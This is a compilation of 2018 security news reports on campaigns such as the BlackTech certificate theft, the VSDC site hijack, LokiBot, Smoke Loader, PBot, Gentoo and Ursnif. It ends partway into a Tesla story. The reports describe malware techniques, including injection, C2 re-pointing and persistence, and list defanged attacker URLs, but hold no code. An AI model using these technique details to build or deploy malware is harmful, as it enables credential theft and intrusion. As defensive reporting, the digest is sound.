The group, referred to as BlackTech, appears highly skilled and focused on the East Asia region, particularly Taiwan. The certificates, stolen from D-Link and security company Changing Information Technology Inc., have been used to sign the Plead backdoor, ESET's security researchers say.

The Plead campaign is believed to have been active since at least 2012, often focused on confidential documents and mainly targeting Taiwanese government agencies and private organizations.

Evidence of the fact that the D-Link certificate was stolen comes from the fact that it was used to sign non-malicious D-Link software, not only the Plead malware, ESET explains.

After being informed on the misuse of its certificate, D-Link revoked it, along with a second certificate, on July 3. In an advisory, the company said that most of its customers should not be affected by the revocation.

“D-Link was victimized by a highly active cyber espionage group which has been using PLEAD Malware to steal confidential information from companies and organizations based in East Asia, particularly in Taiwan, Japan, and Hong Kong,” the company said.

Changing Information Technology Inc., also based in Taiwan, revoked the misused certificate on July 4, but the threat actor continued to use it for malicious purposes even after that date, ESET reveals.

The signed malware samples also contain junk code for obfuscation purposes, but all perform the same action: they either fetch from a remote server or open from the local disk encrypted shellcode designed to download the final Plead backdoor module.

The malware can steal passwords from major web browsers, such as Chrome, Firefox, and Internet Explorer, and from Microsoft Outlook.

According to Trend Micro, the Plead backdoor can also list drives, processes, open windows and files on the compromised machine, can open remote shell, upload files, execute applications via ShellExecute API, and delete files.

“Misusing digital certificates is one of the many ways cybercriminals try to mask their malicious intentions – as the stolen certificates let malware appear like legitimate applications, the malware has a greater chance of sneaking past security measures without raising suspicion,” ESET notes.

The use of code-signing certificates for malware delivery isn’t a novel practice, and the Stuxnet worm, which was discovered in 2010, is a great example of how long threat actors have been engaging in such practices. The first to target critical infrastructure, Stuxnet used digital certificates stolen from RealTek and JMicron, well-known Taiwanese tech companies.

Popular software VSDC official website was hacked and used to distribute malware
12.7.18 securityaffairs

Hackers have compromised the website of VSDC, (http://www.videosoftdev.com), a popular company that provides free audio and video conversion and editing software.
Experts from Chinese security firm Qihoo 360 Total Security discovered that attackers hijacked the download links of the popular audio and video editor, VSDC.

The experts discovered that hackers hijacked download links on the websites in three different periods, the links were pointing to servers they were operating.

The attackers gained access to the administrative server part of the site and replaced the links to the distribution file of the program.

The experts discovered that attacks were registered from an IP address in Lithuania – 185[.]25.51.133.

“360 Security Center discovered the download links of a famous audio and video editor, VSDC (http://www.videosoftdev.com), has been hijacked in official website. The computer will be injected by theft Trojan, keylogger and remote control Trojan after the program is downloaded and installed.” reads the analysis published by Qihoo 360 Total Security.

Below the details of the three different attacks:

June 18 – Hackers substituted download links with hxxp://
July 2 – Hackers substituted download links with hxxp://drbillbailey.us/tw/file.php
July 6 – Hackers substituted download links with hxxp://drbillbailey.us/tw/file.php
VSDC confirmed the incident and fixed the links on its website.

The first and third periods affected the most users that were infected with three different pieces of malware.

VSDC users were receiving a JavaScript file disguised as VSDC software that acted as a downloader for a PowerShell script, which, in turn, would download three malicious payloads, an infostealer, a keylogger, and a remote access trojan (RAT).

The infostealer hijacks sensitive information including Telegram account / password, Steam account / password, Skype chat log, Electrum wallet and screenshot from victims’ machine. Data are sent back to hxxp://system-check.xyz/index.php.

The keylogger records all keyboard actions and sends the record to hxxp://wqaz.site/log/index.php.

The third file is a Hidden VNC remote control Trojan that could be used by attackers to control the infected PC.

The security researcher Ivan Korolev from Dr.Web revealed that the third file is a version of DarkVNC, a lesser known RAT.


· 22h
Popular Software Site Hacked to Redirect Users to Keylogger, Infostealer, More - by @campuscodihttps://www.bleepingcomputer.com/news/security/popular-software-site-hacked-to-redirect-users-to-keylogger-infostealer-more/ …

Ivan Korolev
The third trojan that is screenshoted by Qihoo is DarkVNC, not a TVRAT or SpyAgent. However, they might have replaced the file before it was analyzed by @malwrhunterteam

9:05 AM - Jul 12, 18
See Ivan Korolev's other Tweets
Twitter Ads info and privacy
“This domain name hijacking is a global attack and has affected more than thirty countries. It is more likely to be a Supply Chain Attack instead of a local network hijacking.” continues the analysis.

VSDC hack

“On behalf of VSDC team we’d like to inform our users that the attacks have been stopped and all the vulnerabilities detected and removed”

1. All the source files of the site have been restored, the fake ones have been deleted.
All the passwords have been changed. As our practice has shown, 10-12 character passwords made of random characters are not complex enough, so they have their length significantly increased.
2. Two-level authentication of access to the administrative part at the IIS server level was introduced.
3. On the server currently there is a utility that checks all files for validity.

Smart Speaker Banking Is Coming to a Device Near You, But Is It Secure?
11.7.18 securityaffairs

Smart speaker Banking Is coming to a device near you, Which are the cyber risks associated with their use? Are they a new opportunity for attackers?
The popularity of voice-activated smart speakers like the Google Home and Amazon Echo has made brands, and industries realize there’s adequate demand for introducing technology that lets people accomplish things just by speaking.

They can order items, check traffic in their areas and search for information, among other conveniences.

Soon, smart speaker owners can take care of their banking needs. Should you consider taking that approach, too?

Check Balances and Pay Credit Card Bills
Regional brand U.S. Bank is the first establishment in the financial industry to unveil online banking opportunities that work with all three virtual assistants — Alexa, Google Assistant and Siri — making it relevant to a significant segment of the market.

After a soft launch, U.S. Bank started marketing the option to its customers in June 18. For now, customers can check their account balances and make credit card or mortgage payments. The brand is also reportedly considering letting people transfer money to other account holders.

Also, smaller banks and credit unions offer similar functionality. Capital One and American Express let people pay bills through their smart speakers, too.

Smart Speakers Could Reveal Private Details
Most skills for the Amazon Echo that emphasize productivity give audible information to users. The idea is that they can do things without fumbling with their phones or otherwise using their hands.

The banking apps that work with Amazon and Google smart speakers give information through spoken responses to verbal prompts.

In contrast, people using Apple’s Siri assistant can do some banking tasks with iOS apps that support Siri, but they only see their information displayed on screens. Banking skills are not available on Apple’s HomePod speaker yet, and the company hasn’t divulged if they’re on the horizon.

Imagine the privacy concerns if you use a smart speaker banking app, and it lets your mother-in-law — who’s temporarily living with you — know how much money is in your account because she overhears the speaker’s reply to your prompt?

That’s an example of how a feature that’s supposed to be convenient could instead broadcast sensitive details to others who are nearby.

Users Must Set Up PINs
The banks that provide information to smart speaker owners require people to set up four-digit PINs and recommend that they be different than the individuals’ ATM PINs. As there are with passwords, there are recommended ways to pick a good PIN, too. However, not everyone follows these. Many take the risk of prioritizing handiness over security by setting up passwords that are easy to remember — but equally as easy for others to guess.

Also, although the Google Assistant and Amazon’s Alexa support individual voice recognition, U.S. Bank hasn’t enabled that feature on the platform yet. Security analysts point out that even with voice recognition technology in place, hackers could still record a person speaking and play it back for the speaker to detect later.

And the PINs people enter at ATMs aren’t as secure as many people think. Criminals can use hidden cameras or false keypads to capture PINs as people put them into the machines.

Research also found the motion-sensitive components of smartwatches could capture PIN data, then allow hackers to figure out what numbers they enter with up to 80 percent accuracy on the first attempt.

You can probably envision a scenario where a determined hacker devises a plan to hear a person’s spoken PIN sent to a smart speaker, too.

For example, maybe a smart speaker owner is in the habit of using such a device that’s on a nightstand a few feet away from a window to check a bank account balance each morning. If someone realizes that individual often keeps that window open in hot weather and learns their banking routine, they could wait outside the window to hear the details.

Smart Speaker
Image by Rahul Chakraborty

The Potential for Misunderstood Transfer Requests
If you eventually have the option to transfer money with a smart speaker, that option may not be failsafe, either, especially if you have to utter the person’s name to confirm your request.

Smart speakers have highly sensitive microphones, but they still don’t pick up on everything correctly. In one case, a toddler said “Alexa, play Digger Digger,” and an Amazon Echo Dot started providing pornographic content while adults in the background frantically told it to stop.

What if a smart speaker misinterprets either the name of the person who should receive your money or the amount you want to send? In either case, you could find yourself dealing with a tricky situation that’s difficult to rectify.

Hackers Always Find Ways to Orchestrate Attacks
As with anything else, it’s crucial to weigh the pros and cons. Sure, it might be great to pay your credit card bill with only a vocal command, but are you willing to let a potentially vulnerable smart speaker possess some of your most lucrative information?

Because the possibility of banking with your smart speaker is still so new, speculation primarily informs musings about the security risks that convenience could bring. If smart speaker banking becomes a mainstream practice, hackers will undoubtedly intensify their efforts to break into the speakers and get details that could compromise victims’ financial situations.

About the Author:

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Hacker hijacked original LokiBot malware to sell samples in the wild
11.7.18 securityaffairs

An expert found evidences that demonstrate the current distributed LokiBot malware samples were “hijacked” by a third actor.
According to the researcher who goes online by the Twitter handle “d00rt,” samples of the LokiBot malware samples being distributed in the wild are modified versions of the original sample.

I just released an article where are evidences that demonstrate the current distributed #LokiBot infostealer samples were "hijacked" by a third actor. In the repository there are Scripts for extracting the static config and code for disinfecting. https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_18.pdf …

10:25 AM - Jul 6, 18

Contribute to hijacked_lokibot_version development by creating an account on GitHub.

84 people are talking about this
Twitter Ads info and privacy
The Lokibot malware has been active since 2015, it is an infostealer that was involved in many malspam campaigns aimed at harvest credentials from web browsers, email clients, admin tools and that was also used to target cryptocoin-wallet owners.
The original LokiBot malware was developed and sold by online by a hacker who goes online by the alias “lokistov,” (aks Carter).

The malicious code was initially advertised on many hacking forums for up to $300, later other threat actors started offering it for less than $80 in the cybercrime underground.

According to d00rt there is an explanation for such kind of proliferation online, a threat actor may have “hijacked” the original malware, and even without having a direct access to the original source code he was able to offer other hackers the possibility to set up their own domains for receiving the stolen data.

The expert reversed many pieces of malware and found five references to the C&C server, four of them are encrypted using Triple DES algorithm and one using a simple XOR cipher.

The malware uses the function “Decrypt3DESstring” to decrypt the encrypted strings and get the URL of the command-and-control server.

According to the expert, the Decrypt3DESstring found in the sample he analyzed is different from the ones available in previous variants of the LokiBot malware

The new Decrypt3DESstring function discovered in new samples always return value from the XOR-protected string, instead of Triple DES strings.

“The 3DES protected URLs are always the same in the all of the LokiBot samples of this version,” the researcher wrote.

“Therefore, those URLs are never used. Decrypt3DESstring returns a 3DES decrypted buffer. This should be the ideal behavior of this function, but as was described before, each time Decrypt3DESstring is called, it returns a decrypted url with XOR or encrypted url with XOR.”

Lokibot malware

The expert explained that anyone with a new sample of LokiBot could use a simple HEX editor to modify the program and add its custom URLs for receiving the stolen data.

“The newest (or the most extended) LokiBot samples are patched. There is a new section called “x” where is a xored url. That url is the control panel url. Keeping that in mind, it would be very easy to create a builder, for creating LokiBot samples with a new control panel and sell it. You could change the xored url with another xored url using a hex editor or with a simple script.” continues the analysis published by the expert.

“There exist a builder in the underground forums which is able to create new
LokiBot samples with a custom control panel. As I explained before, this builder
encrypts the control panel with xor an writes it in the “x” section.

d00rt discovered several LokiBot samples available for sale on the underground market that were patched by using a builder available in the underground forums.

The author of LokiBot malware, meantime, has launched the new version 2.0 and he is offering it on many forums.

The decryption function was also being used to get registry values required for making the malware persistent on a system, but since after patching the decryption function only returns a URL, the new LokiBot samples fails to restart after the device reboots.

The expert also discovered that the modification introduced to patch the malware introduces a couple of bugs in malicious code.

Some strings of LokiBot malware are encrypted and the malware uses the function Decrypt3DESstring to decrypt them. After patching this function, it always returns the same string that is the XORed url which is located at “x” section.

“The following is the registry key name used in persistence:
This registry key is encrypted using 3DES algorithm. When the patched LokiBot tries to get persistence, it uses Decrypt3DESstring to decrypt the registry key name. But because that function is patched, the returned string is the url at “x” section, instead of the registry key.

Further technical details for the threat are reported in the research paper published by the expert on GitHub.

Ex-NSO Employee Accused of Stealing Spyware Source Code
6.7.18 securityweek

A former employee of Israel-based cyber arms dealer NSO Group has been accused of stealing spyware source code from the company and attempting to sell it for $50 million, Israel’s Justice Ministry announced this week.

The suspect has not been named, but court documents reveal that he’s a 38-year-old from Netanya hired by NSO as a senior programmer in the company's automation team.

According to prosecutors, NSO informs employees that they are prohibited from copying any software from work devices, a rule that is enforced using a McAfee product that can prevent external storage units from being connected to computers.

Investigators claim that the suspect searched the Web for ways to bypass the security product, methods which he used to copy both NSO software and its source code following a poor performance review from his manager.

The suspect then allegedly searched the Internet for potential buyers of the spyware. He is said to have attempted to sell the files for $50 million in cryptocurrency on the dark web, but his potential buyer alerted NSO, which led to the employee’s dismissal and arrest. Investigators found the stolen files on an external drive hidden under a mattress in the suspect’s home.

Court documents show that the suspect told the potential buyer that he was a hacker who had broken into NSO’s systems.

Authorities allege that the defendant’s actions could have harmed state security and could have led to NSO’s collapse. However, the firm told Israeli media that the stolen files were not shared with a third party.

NSO Group, a company owned by US private equity firm Francisco Partners Management, is best known for Pegasus and Chrysaor, tools designed for spying on iOS and Android phones, respectively.

In 2016, Apple released an emergency patch for iOS after researchers discovered that Pegasus had been exploiting three zero-day vulnerabilities in the mobile operating system.

NSO claims to sell its tools only to governments to help them in their fight against terrorists and criminals. However, Pegasus has apparently been abused in some cases, including in Mexico, where the government was accused last year of using it to spy on journalists and activists.

According to recent reports, Verint Systems is in talks to acquire NSO for roughly $1 billion.

New Smoke Loader campaign aims at stealing multiple credentials from many applications
6.7.18 securityaffairs

Recently experts from Talos security spotted a malware campaign leveraging Smoke Loader to steal credentials from a broad range of applications.

Security experts have discovered a new malware campaign leveraging Smoke Loader to steal credentials from web browsers, email clients, and other popular applications.

The attack chain starts with messages using a weaponized Word document as an attachment, the hackers attempt to trick victims into opening it and enable the embedded macro.

Smoke Loader

Once executed, the macro downloads the TrickBot banking Trojan that in this campaign is used to fetch the Smoke Loader backdoor.

Smoke Loader is a tiny dropper used to install on the infected system other malware families, but in this specific campaign, the experts observed an inversion of roles, with TrickBot that downloads it.

“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader.” reads the analysis published by Talos.

“This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers,”

While malware frequently iterates through process lists to find a process to inject, this new backdoor variant calls the Windows API GetShellWindow instead, then calls GetWindowThreadProcessId to get the process ID of evfdxplorer.exe.

The malware also uses the PROPagate technique to inject code into Explorer, the same technique recently implemented by RIG Exploit Kit operators to deliver cryptocurrency miners.

The malware also implements several anti-analysis techniques, along with anti-debugging and anti-VM checks and the analysis of threads associated with the scanning for processes and windows belonging to analysis tools.

The Smoke Loader variant used in this campaign was receiving five plugins, each of them was executed in its own Explorer.exe process.

The plugins were designed to steal sensitive information from the infected machine and stored credentials and sensitive information managed by the web browser.

“In our Trickbot cases, the malware finally downloaded the Smoke Loader trojan, which installed five additional Smoke Loader plugins.” continues the analysis.

“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader. This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers”

The first plugin implements roughly 2,000 functions and it is able to target a broad range of applications, including Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird, to steal hostname and credentials. This plugin also attempts to steal information from the Windows Credential Manager, as well as POP3, SMTP, IMAP credentials.

The second plugin recursively searches through directories looking for files to parse and exfiltrate.

The third plugin injects into browsers to intercept credentials and cookies as they are transferred over HTTP and HTTPS, while the fourth hooks ws2_32!send and ws2_32!WSASend to attempt to steal credentials for ftp, smtp, pop3, and imap.

The fifth plugin injects code into TeamViewer.exe to steal credentials

“We have seen that the Trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools.” concludes the analysis.

“This clearly shows how important it is to make sure all our systems are up to date,” Talos concludes.

New Smoke Loader Attack Targets Multiple Credentials
5.7.18 securityweek

A recently detected Smoke Loader infection campaign is attempting to steal credentials from a broad range of applications, including web browsers, email clients, and more.

The attacks begin with malicious emails carrying a Word document as an attachment. Using social engineering, the attackers attempt to lure victims into opening the document and executing an embedded macro.

Once executed, the macro initiates a second stage and downloads the TrickBot malware, which instead fetches the Smoke Loader backdoor, Cisco Talos reports.

Smoke Loader has been long used as a downloader for various malware families, including banking Trojans, ransomware, and crypto-currency miners. In some of the previous campaigns, it was also used as a dropper for TrickBot, but it appears tables have turned now.

“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader. This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers,” Talos says.

The new backdoor variant, the security researchers reveal, doesn’t iterate through process lists to find a process to inject code into, but calls the Windows API GetShellWindow instead, then calls GetWindowThreadProcessId to get the process ID of evfdxplorer.exe. It also uses the PROPagate technique to inject code into Explorer.

First described in late 2017, the method hasn’t been adopted by another malware to date, and no public Proof-of-Concept (PoC) has been published to date. Smoke Loader is the first to use the technique, and FireEye too reported this last week.

The malware also includes a series of anti-analysis techniques, along with anti-debugging and anti-VM checks.

Unlike previous attacks, where Smoke Loader would drop additional payloads, the backdoor was observed receiving five plugins instead. Each plugin was executed in its own Explorer.exe process, but older techniques were used to inject each plugin into those processes. The attack ultimately results in six Explorer.exe processes running on the infected machine.

All of the plugins were designed to steal sensitive information from the victim machine and explicitly target stored credentials and sensitive information transferred over a browser.

The first plugin contains around 2,000 functions and targets Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird to steal hostname, username, and password data. Additionally, it attempts to steal information from the Windows Credential Manager, as well as POP3, SMTP, IMAP credentials.

The second plugin searches through directories for files to parse and exfiltrate. The third plugin injects into browsers to intercept credentials and cookies, the fourth attempts to steal credentials for ftp, smtp, pop3, and imap, while the fifth injects code into TeamViewer.exe for credential theft.

“We have seen that the Trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools. This clearly shows how important it is to make sure all our systems are up to date,” Talos concludes.

Adware already infected at least 78000 Fortnite Players
5.7.18 securityaffairs

Rainway reported that tens of thousands of Fortnite players have been infected with an adware while downloading fake v-buck generators
Fortnite continues to be one of the most popular game and crooks are attempting to target millions of fans in different ways.

In June, experts observed cyber criminals attempting to exploit the interest in forthcoming Fortnite Android to infect millions of fans.

Not only users interested in the Android version of the popular game are the target of cyber criminals, crooks are now targeting gamers searching for Fortnite v-bucks generator.

v-buck is the in-game currency can be spent in both the Battle Royale PvP mode and the Save the World PvE campaign, in the former to purchase new customization items while in the latter to purchase Llama Pinata card packs.

Clearly many gamers search for v-buck generators, but these applications may hide dangerous malware.

Fortnite v-bucks

Researchers at the Web-based game-streaming platform Rainway reported that tens of thousands of Fortnite players have already attempted to download the fake generators with the result of infecting their systems.

The malicious code associated with this campaign is a strain of malware that hijacks encrypted HTTPS web sessions to inject fraudulent ads into every website they visit.

“On the early morning of June 26th, we began receiving hundreds of thousands of error reports to our tracker. Not feeling very excited to see such an influx of events on a Tuesday the engineering team was a bit flustered, after all, we hadn’t released any updates to that particular piece of our solution.” reads the blog post published by Rainway CEO Andrew Sampson.
The experts at Rainway started the investigation after they were noticing hundreds of thousands of error reports from server logs. The internal staff discovered that the systems of their users were attempting to connect with various ad platforms.

Since Rainway system only allows to load content from whitelisted domains, all the requests discovered by the company attempted to download ads from other domains and for this reason they were triggering connection errors.

Rainway experts analyzed hundreds of Fortnite exploit software searching for the ones that were generating the same errors reported by Rainway users.

Rainway discovered that the errors were generated by systems that were infected with a fake V-Bucks generator.

Searching online it is quite easy to find any kind of software that poses as a Fortnite hack tool, these applications are advertised through YouTube videos and claim to allow players to generate free V-Bucks, in addition to a classic aimbot.

Fortnite v-buck

Once the malicious code has infected the player’s system, it will immediately install a root certificate and configure the Windows machine to act as a proxy for the web traffic.

This specific campaign was delivering adware that alters the pages of a web request to inject ads.

Fortnite v-buck
The Rainway team was able to identify the server hosting the malware, they were compromised by attackers that were abusing them. The experts informed the company operating the compromised servers quickly removed the malware.

“Now, the adware began altering the pages of all web request to add in tags for Adtelligent and voila, we’ve found the source of the problem — now what?”

“We began by sending an abuse report to the file host, and the download was removed promptly, this was after accumulating over 78,000 downloads. We also reached out to Adtelligent to report the keys linked to the URLs. We have not received a response at this time. SpringServe quickly worked with us to identify the abusive creatives and remove them from their platform.” continues Rainway.

Rainway is warning gamers to not to install hack tools or game cheats.

Given Fortnite’s popularity, we can imagine that many other cases will emerge in the forthcoming weeks.

Hackers Plant Malicious Code on Gentoo Linux GitHub Page
29.6.18 securityweek 

Gentoo Linux GitHub account hacked

Developers of the Gentoo Linux distribution warned users on Thursday that one of the organization’s GitHub accounts was compromised and that malicious code had been planted by the attackers.

“Today 28 June at approximately 20:20 UTC unknown individuals have gained control of the Github Gentoo organization, and modified the content of repositories as well as pages there. We are still working to determine the exact extent and to regain control of the organization and its repositories. All Gentoo code hosted on GitHub should for the moment be considered compromised,” Gentoo said on its website.

According to Gentoo developer Francisco Blas Izquierdo Riera, the attacker replaced the portage and musl-dev trees with malicious ebuilds designed to remove all files from a system. However, the developer says the code doesn’t actually work as intended in its current form.

Ebuilds are bash scripts used by Gentoo Linux for its Portage software management system.

Gentoo pointed out that code hosted on its own infrastructure is not impacted and the Gentoo repository mirrors are hosted in a separate GitHub account that does not appear to be affected by the breach.

“Since the master Gentoo ebuild repository is hosted on our own infrastructure and since Github is only a mirror for it, you are fine as long as you are using rsync or webrsync from gentoo.org,” users have been told.

Gentoo users have been advised not to utilize any ebuilds obtained from the compromised GitHub account prior to 18:00 GMT on June 28, 18. GitHub has suspended the hacked account.

“All Gentoo commits are signed, and you should verify the integrity of the signatures when using git,” Gentoo said.

Pbot: evolving adware
29.6.18 Kaspersky 

The adware PBot (PythonBot) got its name because its core modules are written in Python. It was more than a year ago that we detected the first member of this family. Since then, we have encountered several modifications of the program, one of which went beyond adware by installing and running a hidden miner on victim computers:

Miner code installed through PBot

Two other versions of PBot we detected were restricted to the goal of placing unwanted advertising on web pages visited by the victim. In both versions, the adware initially attempts to inject a malicious DLL into the browser. The first version uses it to run JS scripts to display ads on web pages, the second — to install ad extensions in the browser. The latter is the more interesting of the two: developers are constantly releasing new versions of this modification, each of which complicates the script obfuscation. Another distinctive feature of this Pbot variation is the presence of a module that updates scripts and downloads fresh browser extensions.

Throughout April, we registered more than 50,000 attempts to install PBot on computers of users of Kaspersky Lab products. The following month this number increased, indicating that this adware is on the rise. PBot’s target audience is mainly in Russia, Ukraine, and Kazakhstan.

Geography of infection attempts

Distribution methods
PBot is generally distributed through partner sites whose pages implement scripts to redirect users to sponsored links.
Here is the standard PBot propagation scheme:

The user visits the partner site.
When any point on the page is clicked, a new browser window pops up that opens an intermediate link.
The intermediate link redirects the user to the PBot download page, which is tasked with downloading and running the adware on the victim computer by hook or by crook. The following is a section of code from one such page:

Code of a page propagating PBot

An HTA file is downloaded. On startup this file downloads the PBot installer.

PBot propagation chain

Operating logic
PBot consists of several Python scripts executed in sequence. In the latest versions of the program, they are obfuscated using Pyminifier.

Obfuscated script code

In the new versions of PBot, modules are executed according to the following scheme:

PBot installation

The source file *.hta downloads an executable file, which is the NSIS installer of PBot, to %AppData%.
The installer drops a folder with the Python 3 interpreter, Python scripts, and a browser extension into %AppData%.
Using the subprocess library, the ml.py script adds two tasks to Windows Task Scheduler. The first is tasked with executing ml.py when the user signs into the system, while the second runs app.py daily at 5:00. In addition, the winreg library is used to write the app.py script to the autoloader.
The launchall.py script runs app.py, which handles the update of PBot scripts and the download of new browser extensions.
Next, launchall.py checks whether the following processes are active:
If the processes are found, the DLL-generating script brplugin.py is started. The resulting DLL is injected into the launched browser and installs the ad extension.

Writing the DLL to the browser process memory and executing the library

The browser extension installed by PBot typically adds various banners to the page, and redirects the user to advertising sites.

PBot result: Pop-up window with an ad clip on www.kaspersky.com

In pursuit of profit, adware owners often resort to installing their products on the sly, and PBot developers are no exception. They release new versions (and update them on user computers), complicating their obfuscation to bypass protection systems.
Kaspersky Lab solutions detect PBot with the following verdicts:


Hackers compromised Gentoo Linux GitHub Page and planted a malicious code
29.6.18 securityaffairs

The development team of the Gentoo Linux distribution notifies users that hackers compromised one of the GitHub accounts and planted a malicious code.

Developers of the Gentoo Linux distribution announced that hackers compromised one of the GitHub accounts used by the organization and planted a malicious code.

“Today 28 June at approximately 20:20 UTC unknown individuals have gained control of the Github Gentoo organization, and modified the content of repositories as well as pages there.” Gentoo wrote on its website.

“We are still working to determine the exact extent and to regain control of the organization and its repositories. All Gentoo code hosted on GitHub should for the moment be considered compromised,”

The Gentoo developer Francisco Blas Izquierdo Riera confirmed that attackers took control over the Gentoo repository on Github and replaced the portage and musl-dev trees with malicious ebuilds intended to delete all files from a system. The malicious software could not work on GitHub and the development team has already removed it.

“I just want to notify that an attacker has taken control of the Gentoo organization in Github and has among other things replaced the portage and musl-dev trees with malicious versions of the ebuilds intended to try removing all of your files.” explained Francisco Blas Izquierdo Riera.

“Whilst the malicious code shouldn’t work as is and GitHub has now removed the organization, please don’t use any ebuild from the GitHub mirror ontained before 28/06/18, 18:00 GMT until new warning.”

What is an ebuils?

“An ebuild file is a text file, used by Gentoo package managers, which identifies a specific software package and how the Gentoo package manager should handle it. It uses a bash-like syntax style and is standardized through the EAPI version.” reported Gentoo.

“Gentoo Linux uses ebuilds as the package management format for individual software titles. These ebuilds contain metadata about the software (the name and version of the software, which license the software uses, and the home page), dependency information (both build-time as well as run-time dependencies), and instructions on how to deal with the software (configure, build, install, test …).”

According to Gentoo, the code hosted on its own infrastructure is not impacted. The Gentoo repository mirrors are hosted in a separate GitHub account that were not affected by the security breach.

Gentoo users have been informed not to utilize any ebuilds downloaded from the compromised GitHub account prior to 18:00 GMT on June 28, 18.

As part of the incident response, GitHub has suspended the hacked account, users can verify the signature of the commits to stay secure.

“All Gentoo commits are signed, and you should verify the integrity of the signatures when using git,” Gentoo said.

Mobile Devices Exposed to Spying via Malicious Batteries: Researchers

26.6.18 securityweek  Virus

A team of researchers has demonstrated that specially crafted batteries installed in a smartphone can allow malicious actors to harvest and exfiltrate sensitive information.

Researchers from Technion, UT Austin and Hebrew University showed that an attacker can use a malicious battery to obtain various types of information from a device by continuously monitoring power traces. Monitoring the GPU and DRAM can work, but the CPU and the touchscreen leak the most information, experts said.

Experiments have shown that attackers can – with various degrees of accuracy – deduce characters typed via the touchscreen, recover browsing history, and detect incoming calls and when a photo has been taken. Exfiltrating the data is also possible, one bit at a time, through the device’s web browser.

Rogue Batteries Can Be Used to Spy on Mobile Devices, Researchers Warn

The level of accuracy for determining keystrokes was 36%, and researchers showed that attackers can even search for passwords. In the case of detecting which website the victim has visited from a list of Alexa Top 100 sites, the researchers achieved an accuracy of 65%. An attacker can – with 100% accuracy – detect when a phone call has been made. Experiments also showed a high accuracy related to the use of the camera. In addition to detecting when a photo has been taken, an attacker can obtain data on the use of the flash and lighting conditions, researchers said in their paper.

The method requires replacing the targeted device’s battery with a malicious one, either through a supply chain, evil maid or other type of attack. Due to this reason, combined with the fact that the exfiltration and data harvesting are slow and not always accurate, it’s unlikely that such attacks will be seen in the wild any time soon.

On the other hand, the attack is interesting, especially since it’s stealthy – it has a small hardware footprint and it does not require the installation of any software on the targeted device –, it has a low cost, and it leverages a component that is often replaced by users. In one attack scenario described by researchers, the attacker sells batteries online, offering low prices or extended warranty to attract potential victims.

As for data exfiltration, researchers used the Battery Status API. This API was removed by Mozilla and Apple from their web browsers after experts showed that it posed some potentially serious privacy risks, but it’s still present in Chrome.

This API exposes three parameters: time to full charge and discharge, battery level, and charging state. Experts showed that the charging state parameter (which has a value of 0 or 1 when the battery is charging or discharging) can be manipulated for data exfiltration via the wireless charging technology.

When a phone is charged wirelessly, the battery charging state parameter changes when an active transmitter is detected by the device. By placing a circuit that mimics the wireless charger inside the battery, an attacker can control the charging state to send out bits of “0” or “1”. The attacker needs to convince the victim to access a specially crafted website that can read this data via the Battery Status API. Since this is a bidirectional communication channel, the malicious battery can be configured to detect when the attacker’s site is visited by the victim.

However, the time it takes to detect the transition between not charging and charging is 3.9 seconds and the transition back to not charging is 1.6 seconds, which results in an exfiltration rate of 0.1-0.5 bits per second.

“The attack may seem like a stretch (requires physical battery replacement – or poisoning hardware at a factory), and at this moment one can imagine multiple simpler methods,” commented Lukasz Olejnik, one of the researchers whose work led to Mozilla and Apple removing support for the Battery Status API a couple of years ago. “Nonetheless it is an important study. Is the sky falling? No. Is the work significant? Yes.”

Last year, Olejnik conducted an analysis of the security and privacy implications associated with the ambient light sensors present in phones, tablets and laptops.

CSE Malware ZLab – A new variant of Ursnif Banking Trojan served by the Necurs botnet hits Italy
25.6.18 securityaffairs

Malware researchers from CSE Cybsec ZLab discovered a missed link between the Necurs Botnet and a variant of the Ursnif trojan that recently hit Italy.
Starting from 6th June, a new version of the infamous banking trojan Ursnif hit Italian companies. This malware is well known to the cyber-security community, the Ursnif banking Trojan was the most active malware code in the financial sector in 2016 and the trend continued through 2017 to date.

In previous campaigns, the Ursnif banking Trojan targeted users in Japan, North America, Europe and Australia, later the authors improved their evasion technique to target users worldwide, especially in Japan.

The malware is able to steal users’ credentials, credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites.

The malware has been active since at least 2009, as reported by Microsoft.

The technical information reported by Microsoft refers to an older version of the malware, but the version that is spreading in Italy presents many improvements.

CSE Cybsec ZLab researchers are conducting analysis on the latest version of the malware. The experts started the investigation after the discovery of a suspicious file that was used in a targeted attack against one of its customers.

The attachment used in the campaign that hit Italian companies is a weaponized Microsoft Word document, it uses a social engineering technique to trick users into enabling macros in order to allow the correct view of its content.

Ursnif phishing Word document screen

Moreover, Ursnif once infected a new machine will attempt to spread to any other users in the address book of the compromised email accounts.

In order to trick the victim into opening the malicious email, the message is presented as the reply to an existing conversation conducted by the victim in the past.

While investigating the domains involved in the last phishing campaign against the Italian companies, the researchers discovered many of them were registered by the same email address, “whois-protect[@]hotmail[.]com.”

This email address is directly connected to infamous Necurs Botnet, the malicious architecture that was used in the past months to push many other malware, including Locky, Jaff, GlobeImposter, Dridex , Scarab and the Trickbot.

Further details on the variant of the Ursnif malware that targeted Italian firms, including IoCs and Yara Rules are available in the report published by researchers at ZLAb.

You can download the full ZLAB Malware Analysis Report at the following URL:


Tesla Breach: Malicious Insider Revenge or Whistleblowing?

23.6.18 securityweek  Virus

Tesla Breach

Just before midnight last Sunday evening (June 17, 18), Elon Musk sent an email to all staff. He was dismayed, he said, to learn about a Tesla employee "making direct code changes to the Tesla Manufacturing Operating System under false usernames and exporting large amounts of highly sensitive Tesla data to unknown third parties."

